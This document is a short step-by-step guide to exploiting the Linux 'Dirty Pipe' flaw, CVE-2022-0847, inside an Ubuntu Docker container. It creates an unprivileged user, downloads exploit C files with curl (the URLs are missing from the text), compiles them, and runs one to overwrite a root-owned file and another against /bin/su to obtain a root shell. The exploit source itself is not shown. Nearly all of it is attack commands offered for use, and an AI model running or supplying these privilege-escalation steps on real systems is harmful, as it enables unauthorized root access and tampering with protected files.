CVE-2022-0847: Linux - Write Anything Exploit
Setup environment
# Start a docker container, drop to shell.
docker run --rm -it ubuntu:focal-20220302 /bin/bash
# cd to /tmp, Install GCC / Curl and create a user "foo"
cd /tmp; apt update && apt install -y gcc curl && useradd -s /bin/bash foo
Variant 1: Write Anything
# create a file owned by root.
echo This is roots file dont touch it! > root_owns_this
chmod 644 root_owns_this
# drop to "foo" user.
su foo
# download the payload
curl -o write_anything.c
# compile
gcc -o write_anything ./write_anything.c
# before
cat ./root_owns_this
# exploit
./write_anything ./root_owns_this 1 FOOOOO
# after
cat ./root_owns_this
Variant 2: Root Shell
# drop to "foo" user.
su foo
# download the payload
curl -o dirty.c
# compile
gcc -o dirty ./dirty.c
# exploit
./dirty /bin/su